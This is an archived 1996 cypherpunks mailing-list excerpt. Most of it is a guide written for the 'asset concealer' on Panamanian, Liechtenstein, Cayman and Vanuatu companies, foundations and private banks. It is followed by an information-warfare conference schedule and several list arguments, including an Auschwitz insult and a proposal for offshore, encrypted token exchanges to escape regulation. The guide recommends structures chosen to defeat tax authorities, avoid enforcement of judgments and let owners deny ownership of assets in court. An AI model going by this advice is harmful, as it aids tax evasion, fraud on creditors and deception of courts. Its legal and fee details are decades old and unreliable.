securities trades based on inside information through two Panamanian 
corporations beneficially owned and controlled by Levine) In re Joseph 
A. Lugo, Admin. Proc. File No. 3-6740 (Lexis, Securities library, 
Releases file)(May 10, 1988)(Panamanian bearer stock corporation 
involved in scheme to defraud investors); SEC v. Palmer Fin. Corp., 
Litigation Release No. 12,082, 43 SEC Docket 1230 (D.D.C. May 3, 1989) 
(violations of Sections 13(d) and 16(a) of the Exchange Act).

The combination of opaque ownership anonymity and non-cooperation with 
authorities even in criminal investigations makes Panama the ideal 
first tier expatriation jurisdiction, and an excellent re-investment 
vehicle.

Panama's entities will be discussed in more detail in the second 
"implementation case study" section below.

     Why I like Liechtenstein

I must disclaim my passage here by disclosing that I am personally 
involved in business, banking, and government in Liechtenstein.

Despite her neighbor's less than favorable bent, Liechtenstein remains 
a powerful jurisdiction for the asset concealer.  The primary vehicle 
employed is typically the Liechtenstein Anstalt, but Foundations and 
general trusts are also exceptionally effective.

Unlike Luxembourg and Dublin, Liechtenstein, by virtue of her disdain 
for EU membership, will not be burdened by the proposed standard EU 
withholding tax to which even Switzerland and the Channel Islands may 
eventually be subject.  Though the Channel Islands and the Isle of Man 
are technically outside the EU area, many point to their presence 
within the "sterling area" as dangerous with regard to the proposed 
tax's reach.  Liechtenstein is also much easier to reach than most 
island offshore havens.

Perhaps best of all, foreign judgments, except in Switzerland or 
Austria, are not enforceable in Liechtenstein.  Private plaintiffs 
will waste their time seeking local assistance in attaching assets.

       Liechtenstein Entity Forms

       The Anstalt

The Anstalt or "Establishment" is a corporation which is more 
accurately characterized as a international holding corporation.  
Typically financial or controlling interests in foreign corporations 
and other entities are left in the care of an Anstalt and thus in the 
jurisdiction of Liechtenstein.  In many ways Anstalts function much 
the way that conventional trusts do.  An Anstalt can be founded with 
only one "founder" or "promoter" who is typically an agent local to 
Liechtenstein acting for an anonymous owner.  The local agent holds 
the charter of ownership on the Anstalt, which is the only record of 
the actual beneficiary of the entity, and can be made a bearer 
document.  Owners of Anstalts enjoy advantages such as: Thirty year 
tax rate freezes, no mandated debt-equity ratio, liability limited to 
assets, and extremely low taxation.  Some 70,000 Anstalts exist, 
though the precise number is a closely held secret (to avoid any 
attempt at process of elimination guesswork).  There is a one time fee 
to establish an Anstalt, generally SwFr 1,000 or 3% of the starting 
capital, and a yearly tax on net assets of the greater of 0.1% or SwFr 
1,000.  Dividends are taxed at 4%.  A minimum capital requirement of 
SwFr 30,000 exists for Anstalts, but can typically be waived.  
Taxation is more complicated for commercial entities in Liechtenstein, 
and auditing requirements apply, but generally taxation falls within 6 
to 18%.  There are no reporting requirements for Anstalts which do not 
themselves conduct commercial activities.

Some problems with the Anstalt still remain.  Anstalts, like 
Panamanian corporations, are generally bearer certificate owned and 
easily transferable as a result.  Because of this, and the fact that 
most Anstalts are single owner entities, asset disputes can result if 
the bearer document falls into the wrong hands.

       The Treuunternehmen

Treuunternehmens or "Trust Enterprises" are modeled after the 
Massachusetts trust and are generally unlimited as to its structure.  
Offshore activities, while better left to other jurisdictions in 
general, can be best effected through Treuunternehmens.  

       The Stifung

For the wealthiest clients, the security of Liechtenstein's 
foundations (Stifungs) are unparalleled, even in the offshore world.  
While establishing a Stifung requires a due diligence finding by the 
trustee or founding attorney of the client's general good character, 
the disposition of the funds applied after the founding of a Stifung 
will be unscrutinized.  Stifungs require a separate offshore holding 
company for administration, have a board of directors, and a 
trustee/attorney.  The beneficiary is known only to the directors, and 
the attorney.  Like Anstalts and Treuunternehmens, Stifungs offer 
limited liability.  Stifungs can be best described as autonomous funds 
without corporate structures.

Stifungs too have some cautionary notes attached.  The director of a 
Stifung may take a narrower view of the distributions of assets than 
the original founder originally intended.  As directors are usually 
singular in Liechtenstein Stifungs, there is no recourse to 
disgruntled beneficiaries.  Of course, these problems are easily 
solved if a close and trusted person can be appointed as the founder.  
Many trustees suggest the original founder's successor be appointed 
automatically on the death of the former.  Additionally, paying out on 
the entire net worth of the Stifung tends to assure the correct 
ownership attribution.

All of these entities are perfect for the asset concealer who wishes 
to stand before a local court and deny ownership of additional assets.  
In addition to being technically true of the beneficiary of an Anstalt 
or Stifung, it has the additional advantage of being entirely 
uncontradictable.  Anstalts can be in bearer form, and Stifung 
founders are typically trustees.  A measure of the frustration of U.S. 
regulatory and prosecuting authorities in tracing the owners of 
Anstalts can be seen in the slew of U.S. proceedings with similar case 
names.  e.g., SEC v. Certain Unknown Purchasers, No. 81-Civ-6553 
(S.D.N.Y. July 25, 1983)

       The Aktiengesellschaft

Aktiengesellschafts, "Share Companies," or "Stock Corporations" are 
primarily Anstalts for larger number of beneficiaries, and provide 
more complicated vehicles for share distributions and stricter 
internal board requirements.  They also have an initial capital 
requirement of SwFr 50,000.  Bearer or registered shares are 
permitted.  Shares may be held by nominees.  Aktiengesellschafts are 
required to keep proper books, appoint qualified auditors, and submit 
balance sheets to Liechtenstein tax authorities.

While holding corporations are a simple matter to establish, less than 
savory investors will have difficulty with direct banking.  
Liechtenstein has been conscious of her international reputation, and 
generally more fussy about her banking clients.  Those depositors with 
less than SwFr 250,000 will be unable to expect much personal 
attention even if bankers will generally not turn away small 
depositors.  Depositors with SwFr 1,000,000 or more can expect fuller 
service banking services including portfolio advice.  Depositors with 
SwFr 3,000,000 can expect completely individualized service, including 
discretionary management by multiple fund managers directed to the 
client's individual needs.  Forming individual financial institutions 
is extremely difficult.

       Secrecy

Generally, Liechtenstein enjoys much more potent secrecy than her 
neighbor Switzerland, but because this has been somewhat eroded by 
international money laundering agreements and exceptions for criminal 
enterprises, she is a better reinvestment and shell management vehicle 
than expatriating entity.

The SEC's own Mr. Haberman commented once on Anstalts, "We've traced 
stuff to Anstalts in the past and then couldn't get anywhere - where 
the money came from, who the beneficiaries were, nothing."  Indeed, 
even where the ownership of the Anstalt is "obvious," proving it in 
court without the charter documents or extensive showings of financial 
information is all but impossible.  The combination of a Liechtenstein 
Anstalt as an umbrella for offshore corporations in other 
jurisdictions and bank accounts in a separate, potent banking secrecy 
jurisdiction is thus an excellent concealing combination.

Criminal activities, particularly drug related, are likely to remove 
the veil of secrecy, but unlike Switzerland, Liechtenstein's bankers 
have not explicitly adopted the SBA's 1982 "due care" agreement.  
Secrecy in regard to tax matters is as absolute as can be found 
worldwide.  Liechtenstein and her financial institutions will under no 
circumstances whatsoever render any assistance to tax authorities.  
Assistance in criminal matters, even in light of the recent money 
laundering compact, is limited to those cases where the activity in 
question reflects badly on Liechtenstein as a financial center.  
Criminal investigation assistance under the Legal Assistance Act 
expressly provides for natural and legal entity secrecy even in 
cooperation with foreign authorities unless the crime in question is 
also illegal in Liechtenstein.  Assistance in the case of criminal 
charges stemming solely from tax evasion or currency infringements and 
related offenses will be curtly denied.

The 1992 provisions criminalizing drug-trafficking 
(Betaaubungsmittelgesetz). provide for five year sentences for those 
acting to hinder the discovery or retention of assets related to 
illegal drug production, distribution, storage, etc.  1995 provisions 
adopting Europe's convention against money laundering expands the 
exceptions to banking secrecy to proceeds having their origin in any 
sort of criminal offense which is also illegal in Liechtenstein.

Lawyers and trustees have a right of silence in any administrative or 
judicial proceeding, and secrecy is expressly written into statutes in 
several places.

Liechtenstein is best used as a tax shield and post expatriation 
umbrella for asset reinvestment rather than initial expatriation.

For a detailed treatment of Liechtenstein Laws with regard to insider 
trading, See, Emmanuel Gaillard, Insider Trading: The Laws Of Europe, 
The United States And Japan, 1992.  For a critical look at 
Liechtenstein secrecy entities, See, Liechtenstein's Uncertain 
Foundations, Anatomy of a Tax Haven, UE Ramati, Hazlemore Ltd Tax 
Publications, Dublin.

     Why I Like (sort of) The Cayman Islands

While the Islands have attracted increased law enforcement attention 
of late, they remain very attractive as a base for offshore 
corporations.  Cayman typically implies no-direct taxation, is not a 
party to any tax treaties, and grants exceptionally secure assurances 
against future increased taxation.  Cayman has excellent 
telecommunications systems, offers direct dialing to offshore 
locations and remains on eastern standard time all year long.  
Government fees are the greatest burden to the asset concealer.

The real hitch in the Caymans is the mutual legal assistance treaty 
between the United Kingdom and the United States.  The treaty provides 
for information sharing in those instances where crimes are mutually 
recognized.  This, of course, excludes tax related offenses if they 
are not connection with otherwise criminal activity.  Investigations 
into narcotics trafficking activates a more liberal agreement which 
gives the U.S. Attorney General direct access to otherwise 
confidential information regarding Cayman Islands account holders.

       Entities in the Caymans

Every Cayman company is required to keep a register of its directors, 
officers, mortgages, charges, and shareholders.  Exempted companies 
may keep their registers anywhere in the world, others must keep it 
locally.  Exempted companies are not required to disclose any of their 
shareholders publicly.

Cayman corporations are divided into three types.  Local companies, 
exempted companies, and nonresident companies.  Local companies are 
permitted to conduct business in the islands.  Exempted companies are 
the general vehicle used to conduct offshore business and while they 
may use a local office to do so, they may not themselves conduct local 
business.  Nonresident companies are less flexible than exempted 
companies, but are less expensive to form.

Companies can typically be formed in one to two days and the documents 
are fairly simple.  Nearly 2,500 new companies are formed every year 
in the Caymans, offering the asset concealer ample opportunity to be 
lost in the crowd.

Exempted companies are granted a 20 year stay on taxes of any kind.  
Unlike non-resident companies, exempted companies can issue bearer 
shares, no par value shares, and need not include "Limited" or "Ltd." 
as part of their business name.

Directors of exempted companies must hold at least one meeting a year 
locally but alternate directors are permitted and often trust company 
stand-ins are used.  While exempted companies can have a single 
shareholder, nonresident companies must maintain 3 or face personal 
liability of the shareholders for company debts.  Exempted companies 
cannot invite Cayman citizens to hold shares or debentures, though 
unsolicited share and debenture purchases are permitted to them.

       Private Banking

Cayman is particularly useful, even given the criminal legal 
assistance treaties, in its ease of banking entity establishment.  
More than 500 licensed banks exist on Grand Cayman, and several trust 
companies have been formed in the last decade.  Banks and trust 
companies must be licensed by the Governor and Executive Council.  
Class A licenses permit local and offshore operation, and Class B 
licenses permit only offshore operation.  Multinational corporations, 
families, and even individuals with "clean" credentials have been able 
to obtain licenses for banks and trust companies in the Caymans 
without much difficulty.  Unrestricted Class B licenses have a capital 
requirement of about $500,000 with a 100% pay in requirement, though 
portions may be guaranteed.  It is possible, in some circumstances, to 
obtain a restricted Class B license with less capital.

Class A licenses cost $50,400 per year, while Class B licenses a mere 
$15,120.  Setting up an offshore bank in Cayman should be possible 
with $40,000 and $25,000 per year.  Quarterly financial statements are 
required and while annual financial statements must be audited, they 
need not be published.  Class B licenses are generally eligible for a 
20 year guarantee against taxes.  Restricted Class B licenses are also 
available, but these can be hard to come by.  Restricted licenses 
limit the number of depositors, and the undertaking which the bank may 
involve itself with.  Usually a filing with the authorities is 
required.  As the cost of obtaining an unrestricted Class B license is 
essentially the same, it is not usually worth the extra effort to 
pursue a restricted license.  Cayman banks of all flavors can be owned 
by a single shareholder, and contracting with local banks to operate 
facilities and lend personal are both permitted.  Typically trust 
companies charge between $15,000 and $25,000 per year for such 
services.

[...]

Government fees are the most plaguing obstacle to the asset concealer.  
If prices continue to increase, it may be beneficial to seek other 
jurisdictions in which to conduct ones activities.  Despite expense, 
Cayman is still an excellent place to establish an offshore investment 
company, a bank or financial institution, captive insurance company, 
or offshore trust.

     Why I Like Vanuatu

The pacific island nation of Vanuatu was at one time a condominium 
administered by France and the UK.  Currently, Vanuatu, formerly 
called The New Hebrides, is a Republic with a multi-party democracy 
and regular elections.  Under the British, Vanuatu adopted many of the 
aspects that today make it an interesting asset concealing 
jurisdiction.  Vanuatu has a balanced budget, a balance of payment 
surplus, no or almost no public debt and low inflation.

The government has explicitly endorsed tax haven type policies and 
even the opposition parties seem uninterested in rocking the boat.  
Australia, however, has tightened regulations on her citizens who 
transact with Vanuatu.  Australian citizens must now file a "taxation 
clearance certificate" with local authorities before conducting 
business with Vanuatu.  Taxation Administration Act, section 14C 
(Australia)  In practice, such certificates are virtually impossible 
to obtain.

The great advantage of Vanuatu is the saturation of tax-haven 
participants.  Local financial, legal and accounting services have 
been so successful and numerous, that a flurry of merger and 
acquisition activity has resulted in the consolidation of several 
entities.  The result has been increased stability in these areas.

There is no registration requirement for trusts in Vanuatu, so there 
is no official account of their number, though it can assumed to be 
large as several large trust companies, some captives of major 
worldwide trust companies or banks, work actively on the islands.  
Offshore exempted (secret) companies number 650+.

       Bearer Shares

Exempted companies in Vanuatu are "secret" and disclosure of financial 
or ownership information is punishable by a fine of VT100,000 or 
imprisonment of up to 12 months.  (1VT=$0.009 at the time of this 
writing).  Companies Regulation 1971, section 416.  While non-exempt 
companies require public filings of ownership, in practice this is 
often circumvented by trust ownership and registration in the names of 
the nominees.

Warranted bearer shares can only be issued by non-exempt companies and 
must be fully paid in.  Companies Regulation 1971, sections 38(a), 93.

Perhaps most importantly there are no taxes what so ever on capital or 
corporate profits.  As a result there are no double taxation treaties, 
and hence no provisions for information sharing whatsoever.  The 
obscurity of Vanuatu makes this one of the most impenetrable offshore 
centers around.

Banking does not permit coded accounts, or accounts in pseudonyms, 
although practically there are few if any checks on identity for 
depositors.  Local trust companies make these restrictions effectively 
unimportant, as nominee services are readily available to assure more 
potent account secrecy.

New companies can be very quickly set up in Vanuatu.  Three working 
days turn around time can be expected if an application is filled out 
in detail and in advance.  While off the shelf companies are not 
"available," in practice abandoned, unwanted, unused, or idle 
companies can often be purchased from local vendors.

Corporate forms in Vanuatu follow the Cayman Islands and Bahamas 
models.  The result is an excellent offshore style legal framework.

Companies in Vanuatu may be limited by shares, by guarantee, or 
unlimited.  They may be private, (if the articles impose: self 
restricted transfer of shares, members number less than 50, and a 
prohibition on public subscription for shares or debentures), or 
public.  For the asset concealer, the private company is the most 
useful.

Exempted companies are not permitted to own shares in non-exempt 
companies, own interest in any local undertaking, allow public 
subscriptions to stock or debentures, or conduct any business with any 
non-exempt company.

Any local judicial proceedings involving exempted companies in Vanuatu 
will be held in camera, and public records of the proceedings will not 
be recorded.

Technically speaking, a Vanuatu corporation is required to have issued 
and paid two shares in the minimal amount of VT1/share.  No formal 
requirements as to shares is actually required and shares with no par 
value at all may be issued by unlimited companies.  Exempted companies 
need only have one director and a separate secretary.

       Private Banks

The real gem of Vanuatu, however, is the ease with which the asset 
concealer may create a banking company.

Financial institutions in Vanuatu must be licensed and must have a 
minimum paid in capital of VT12.5 million if the head office is in 
Vanuatu, and VT50 million otherwise.  There is an annual license fee 
of VT300,000.  Reserve fund and liquid asset minimum holdings are 
enforced, and banks or financial institutions may also be exempted if 
they conduct no local business except with related entities and 
exempted financial institutions and banks are not subject to many of 
the stricter regulations imposed on non-exempt entities.  Unlike 
almost any jurisdiction, financial institutions may be exempted.  This 
is a powerful tool for asset transfer, privacy and concealment.  
Exempted banking entities are afforded a good deal of flexibility in 
their minimum capital requirements subject to the approval of the 
Registrar.  There are no reserve or equity ratios imposed on exempt 
banks.  Most interestingly, local trust companies are in the habit of 
providing all staff, local directors, attorneys, and required personal 
for exempted banks.  Some beneficial ownership and audit requirements 
are in force, but exempted financial institutions and banks can expect 
full confidentiality as a matter of course and lax enforcement.

Combined with the complete absence of currency controls, Vanuatu is 
nearly the perfect jurisdiction for those asset concealers interested 
in founding their own private financial institution.

[...]

See Generally, Vanuatu Companies Regulation 1971, Vanuatu Banking 
Regulation 1970, Vanuatu Trust Companies Regulation 1971.


(Continued in Volumes II, III, and IV)

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: winn@Infowar.Com
Date: Sat, 30 Mar 1996 09:16:45 +0800
To: cavouk@io.org
Subject: InfoWarCon IV - Final Schedule
Message-ID: <199603281504.KAA04763@mailhost.IntNet.net>
MIME-Version: 1.0
Content-Type: text/plain


     P L E A S E   D I S T R I B U T E   W I D E L Y
             F I N A L   S C H E D U L E 

          IW4 -- InfoWarCon (Europe) '96
Fourth International Conference on Information Warfare:
         Defining the European Perspective
                 Brussels, Belgium
                   May 23-24 1996

Sponsored by:

National Computer Security Association
Winn Schwartau, President and CEO, Interpact, Inc.
Robert David Steele, Chairman & CEO, Open Source Solutions Group

CoSponsors:

IBM
Internet Security Systems, Inc.
Jane's Information Group
Network Systems, Inc.
Norman Data Defense

Background

Information Warfare represents a global challenge that faces all late-industrial
and information age nation states.  It also represents the easiest and cheapest
way for less developed nation-states and religious or political movements to
anonymously and grieviously attack major nations and international corporations.

Not only are the definitions of InfoWar unclear, but they span many areas and
disciplines.  This conference will examine the European perspectives on all
three classes of Information Warfare while contributing some American lessons
learned, mistakes made and successes enjoyed.

Class One: Personal Privacy
Class Two: Industrial and Economic Spying and Warfare
Class Three: Global Conflict, Terrorism and the Military

As at all other Information Warfare Conferences, this special European
Conference encourages active audience participation, contribution and debate.

        May 22, 1996

17:00 - 20:00 Pre-Registration
18:00 - 21:00 Hosted Cocktail Party with Music
     Meet Mr. Schwartau, Mr. Steele and many of our other distinguished guests 
and
     conference speakers for casual 'off-line' conversation..

        May 23, 1996

07:00 - 08:30 Registration
07:00 - 08:30 Sponsored Continental Breakfast
PLENARY SESSIONS
08:30 - 09:00 Keynote Speech
	Maj. General Edwin Ebert
	J-6 Assistant Chief of Staff (C4I) USA
09:00 - 10:00 "Information Warfare: Chaos on the Electronic Superhighway"
	Winn Schwartau, President and CEO, Interpact, Inc., USA
10:00 - 11:15 East Versus West: Military Views of Information Warfare
	Moderator: Robert Steele
	East: General Nikolai Ivanovich Turko, Information Warfare Russia
	West: US - Gen. Jim McCarthy USAF (Retired)
11:15 - 11:45 Sponsored Break
11:45 - 13:00  Information Warfare or Information in Warfare?
		Support for Conventional War Fighting
	Moderator: Winn Schwartau
	Panel:
		Russia: Admiral Vladimir Semenovich Pirumov (Retired)
		Chairman of Scientific Counsel of the Russian Security Counsel
		Sweden: Navy Captain Bo Wallendar
		UK:     Captain Patrick Tyrell, Assistant Director, Information
                                     Warfare Policy, Ministry of Defence
13:00 - 13:30  Dealing with Internet Intruders in Emergency Mode: An IBM 
Perspective
               Peter Streibelt, IBM Europe Program Manager for Advanced 
                     Networking and Internet Emergency Response
13:30 - 14:30 Lunch
BREAKOUT SESSIONS
14:30 - 16:00
Breakout One: 	Defending Against the Internet:
			The Threat to European Civil Prosperity
	Moderator: Mich Kabay,
	Klaus-Peter Kossakowski, DFN-CERT, Univ. of Hamburg, Germany
	Christopher Klaus, CEO and Founder, Internet Security Systems, US
	Peter Streibelt, IBM Europe
Breakout Two:  "Paradigm Shift"
	Moderated by: Winn Schwartau
	Dr. Phillipe Beaumard, University of Paris, France
	Colonel George Dunlop, USAF
16:00 - 16:30  Sponsored Break
PLENARY SESSION
16:30 - 18:00  "Hackers: National Resources or Merely Cyber-Criminals?"
	Co-Moderators:
		Mich Kabay, Ph.D., Director of Education, NCSA and
		Robert Steele, President, OSS, Inc.
		Rop Gonggrijp - Hactic and The Digital City, Amsterdam, 
		Andy Mueller-Maguhn, CHAOS Computer Club Germany
		"Frantic" - Anthony C. Zboralski - Convicted French Hacker
18:00 - 21:00  Hosted Reception
21:00 - 23:00  Self-paid Dinners for "Birds of a Feather."
		Rallying points will be provided.

May 24, 1996

07:00 - 8:30 Sponsored Continental Breakfast
08:30 - 9:00 Keynote Speech
"Efforts to Maximize Information As New Age Weapon"
	General Pichot-Duclos, France
PLENARY SESSIONS
9:00 - 10:00 "Creating Smart Nations Through National Information Strategies:
		Intelligence And Security Issues"
	Robert David Steele, President, OSS, Inc. US
10:00 - 11:15  "The Convergence of Military and Commercial Vulnerabilities"
	Moderator: Winn Schwartau
	Panel:
		Bob Ayers, Chief IW Division, DISA, Department of Defense, US
		Captain Patrick Tyrell, Assistant Director, Information Warfare
		Policy, Ministry of Defence, United Kingdom
11:15 - 11:45 Sponsored Break
11:45 - 13:00 Societal Impact of Information Warfare
	Moderator:  Winn Schwartau,
	Panel:The Croatian View: Pedrag Pale, Chairman of the InfoTech
Coordinating Committee, Ministry of Science,
Technology, and Informatics
		Dr. Ken Dark, Fellow, University of Camabridge, UK
13:00 - 13:30  Sponsored Luncheon Presentation
13:30 - 14:30 Special Luncheon Presentation
BREAKOUT SESSIONS
14:30 - 16:00
Breakout One: Legislation & Personal Privacy: A Global Electronic Bill of
Rights?
	Dr. Mich Kabay, Director of Education, NCSA
	Simon Davies, Electronic Privacy International, UK
	Dr. Leroy Pearce, Senior Technical Advisor, representing MajGen Leech,
		Asst. Deputy Minister of Defence Information Services, Canada
Breakout Two: "Industrial Espionage: An Update"
	Moderator: Robert Steele
	Maurice Najman, Television Coorespondent, France
	Miguel Chamorro, Exec. Director, Interpol (invited)
	UK, Arish Turle, Kroll Associates
16:00 - 16:30 Sponsored Break
PLENARY
16:30 - 18:00 Defining War in the Information Age
		"The New National Security"
Brief comments by Winn Schwartau and Robert Steele - and then a lively
interactive audience debate.
18:00 - 18:10 Closing Comments
18:00 - 20:00 No-Host Reception

For complete schedules, and information on InfoWarCon IV (Europe)
MAIL OR FAX OR EMAIL:

 National Computer Security Association
 10 South Courthouse Avenue
 Carlisle, PA 17013
 Phone 717-258-1816 or FAX 717-243-8642
 EMAIL:conference@ncsa.com

To obtain the latest edition of this program, send EMail to:
euroinfowar@ncsa.com

For more information about NCSA:

 WWW: http://www.ncsa.com
 CompuServe: GO NCSA
 Email: info@ncsa.com

Sponsorships for various InfoWarCon (Europe) 96 events are still available.  To
Find out how to sponsor portions:
Contact Paul Gates at the NCSA: pgates@ncsa.com

To reach: Winn Schwartau:  winn@infowar.com
          Robert Steele:   ceo@oss.net

V 1.19/3.11.96 SH



Peace
Winn

		        Winn Schwartau - Interpact, Inc.
		        Information Warfare and InfoSec
		       V: 813.393.6600 / F: 813.393.6361
			    Winn@InfoWar.Com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Neely <accessnt@ozemail.com.au>
Date: Sat, 30 Mar 1996 18:34:41 +0800
To: cypherpunks@toad.com
Subject: Re: What backs up digital money?
Message-ID: <199603300000.KAA12656@oznet02.ozemail.com.au>
MIME-Version: 1.0
Content-Type: text/plain




>I would say
>that gold and diamonds do have intrinsic value, based on their beauty
>and the desire of people to own them.  

Well, doesn't this beg the question - the "desire" by people to own them
is not as a result of advertising, but the fact that society has long 
fixed them as standard units of "currency".

If all those centuries ago marble was decided upon as a central 
unit of currency, we'd all be killing ourselves to get some, not because
of any aestetic beauty.

Mark
___
Mark Neely - accessnt@ozemail.com.au 
Lawyer, Internet Consultant, Professional Cynic
Author: Australian Beginner's Guide to the Internet
Work-in-Progress: Australian Business Guide to the Internet
WWW: http://www.ozemail.com.au/~accessnt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sun, 31 Mar 1996 02:09:35 +0800
To: cypherpunks@toad.com
Subject: Re: Why Americans feel no compulsion to learn foreign languages
In-Reply-To: <ad8241c03f021004d4c1@[205.199.118.202]>
Message-ID: <iDyLLD22w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) writes:
> At 12:50 PM 3/29/96, Dr. Dimitri Vulis wrote:
>
> >Likewise, Tim says there's no value in learning about "traditional" crypto.
> >I say there is.
>
> This is taken completely out of context and is beneath contempt in terms of
> trying to argue a point.

No, I think both of Tim's statements illustrate the typical Americans disdain
for learning for knowledge's sake and the (still amazing to me) ability to
express pride in their ignorance. Most Americans lack the motivation to learn
a foreign language (or even their native language), or to learn what great
naval battles of WW II were won because certain codes were broken, or how to
prove that two triangles are congruent, or how to break a substitution cypher,
since this knowledge won't bring immediate monetary rewards. It's as if though
their challenge is to go through life learning as little as they can get away
with (other than obscure sports statistics).

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 31 Mar 1996 08:54:01 +0800
To: "Declan B. McCullagh" <cypherpunks@toad.com
Subject: Re: New crypto bill to be introduced
Message-ID: <m0u34m7-0008yEC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:35 AM 3/30/96 -0500, Declan B. McCullagh wrote:
>A few responses to Jim Bell:
>
>* Why would Sen. Burns introduce *this* particular crypto bill? Would
>you believe that he wanted to appear cyber-clueful and net-friendly, but
>didn't know exactly how to do that -- so certain people suggested that
>this bill would be an appropriate way to do it?

I'm well aware of symbolic gestures.  Maybe this is one of them.  But having 
not seen it yet it's who knows how worthy it is.  I'm wondering when 
somebody is going to post it.  I'm also waiting for those people who claimed 
that the Leahy bill was dead (for lack-of-time reasons if nothing else) to 
express the same opinion of this newer bill.  Not that I want it dead; I 
just want to see if people are using consistent levels of logic.

>
>* Why would Sen. Burns introduce this particular bill *now*? One word: CFP.

Yes?

>* Why would Jim Bell post anonymously? He writes:

>> That is a silly conclusion.  The primary reason for anonymity with such 
>> postings is to avoid controversy being associated with one's name.  I, as 
>
>No, the primary reason for anonymity is to avoid being *associated* with
>one's name. I know this may be attributing an undeserved sense of
>precedence, but perhaps Jim Bell has realized that his opinions are
>discarded out-of-hand by many on this list, so he posts anonymously to
>regain some credibility. A message from anonymous would also work nicely
>to reinforce his own position, allowing Jim Bell to claim additional
>allies.

In view of the fact that I've repeatedly publicly stated that I'm not aware 
of the Leahy-bill position of many if not most of the people listed, this 
seems unlikely.  Like most of the people around here, I'm still waiting for 
some sort of showing that demonstrates why any given person was listed.  I'm 
also waiting for counter-arguments:   For example, statements by those 
listed, or others, explaining why they they should not have been listed.  
There is a distinct lack of documentation from BOTH sides.  This leads me to 
suspect that there may really be only one side there: a straw man set up 
anonymously, and a bunch of people racing (non-anonymously, of course!) to 
knock him down.  (Or possibly the original anonymous message was legit, and 
some others were posted to discredit the original post; I may not have those 
messages, and I haven't looked to see if they came from a stable anonymous 
address.)


>Anyway, last night I sat next to Dorothy Denning on the bus to the EFF
>Pioneer Awards reception and dinner, and we chatted for about 20
>minutes. She's a sweet old lady -- I can't think of anyone with whom
>it's easier to agree to disagree. I asked her what she thought of a
>number of people -- on Tim May she said: "Let's not talk about that."
>She also said she's educating a House committee about crypto next week
>-- I dearly hope our side will have some experts there
 as well.

I think we need to ask ourselves why Denning keeps getting invited to these 
kinds of hearings.  If the purpose is to get an accurate, unbiased view of 
encryption, I'm sure there's plenty of experts who could take her place 
without sharing her conveniently pro-government position.  Never having seen 
such a hearing, I can't say for sure, but I suspect she's billed as an 
"encryption expert," when in fact she should be labelled as a 
"pro-government-biased encryption expert."  Which, I suppose, is okay too, 
since all sides deserve to be heard.  However, there should be no illusion 
about her point of view in such matters.

Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 31 Mar 1996 07:25:19 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: The limits of my patience.
Message-ID: <m0u34mC-0008yOC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:43 AM 3/30/96 -0500, Black Unicorn wrote:
>
>On Fri, 29 Mar 1996, jim bell wrote:
 
>> Explains a lot!   You _are_ paid for this.  In an earlier era, you would 
>> have gladly run the ovens at Auschwitz if you'd gotten paid for it.
>
>You're way out of line here.
>I expect an apology.

And as a form of protest, I recommend that you refuse to post any more 
messages to CP until you get it!  That would solve a lot of problems, I think.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 31 Mar 1996 02:23:53 +0800
To: Hal <hfinney@shell.portal.com>
Subject: Re: What backs up digital money?
In-Reply-To: <199603291832.KAA06165@jobe.shell.portal.com>
Message-ID: <Pine.SUN.3.91.960330093914.13577C-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 29 Mar 1996, Hal wrote:

> From: jeff@BlackMagic.Com (Jeff)
> > 
> >   Regarding "What backs up digital currency/cash", a hypothetical situation
> >   just to see what you guys think.  Can this happen ?  I honestly have my
> >   doubts, mostly I see logistical problems (finding a mechanism, etc, if
> >   you recall my mini-rant just a few days ago).  Anyway, these are some of
> >   the things I honestly feel would have to happen for a true Internetwork
> >   currency to take off, if that's even possible.
> > [Lots of examples of tokens issued by various businesses and other groups]
> 
> I think this is an interesting idea, and no doubt will happen in some
> form.  Coupons and other special tokens could be issued electronically.
> But there are limits to how far it is likely to go, since these tokens
> are competing with ordinary cash-backed tokens (digital cash).  It's like
> today, maybe you could buy something at the swap meet using a handful of
> 50-cents-off toilet paper coupons, if the seller was agreeable.  But this
> becomes in essence a barter trade.  Why do this, if the cash alternative
> is much more widely accepted?

The solution is a series of a "coupon/token exchange."  One can imagine a 
service which does nothing but exchange all forms of coupons/tokens or, 
indeed, provides a fluid market for them a la "Idea Futures."

If a given coupon/token issuer wanted complete fluidity, he has merely to 
offer the coupons/tokens on the coupon/token exchange.  After a basic 
finding, the market will take care of the rest, including valuation.

This gives the individual issuer exchangability, to the extent the 
market percieves his coupons to be worth something.  Individuals not 
interested in their 'currency' being public could refuse to offer them on 
the exchange, or offer them on the exchange "blindly" without a 
description of their terms of redemption, and thus maintain an 
underground market in the tokens or coupons, used, one would assume, only 
by those who were familiar with the terms of redemption.

> Another factor that arises is that if some token does catch on and
> circulate widely, it could be subject to regulation.

With an offshore exchange, this becomes almost a non-issue.  Particularly 
if encryption is used to mask exchanges.

> I understand that
> in Las Vegas, some people started using casino chips as money.  You
> could buy things with them, and they were accepted since people knew
> they could be turned in for cash at the casino.  But the Feds cracked
> down and brought the practice to a halt.  (I will ignore for now the
> question of whether such a crackdown could work on the net, but it would
> at least be a barrier to the acceptance of such tokens.)

Again, if you had an offshore entity which provided easy convertability 
to, e.g., e$ dollars, this becomes impossible to eliminate.
 
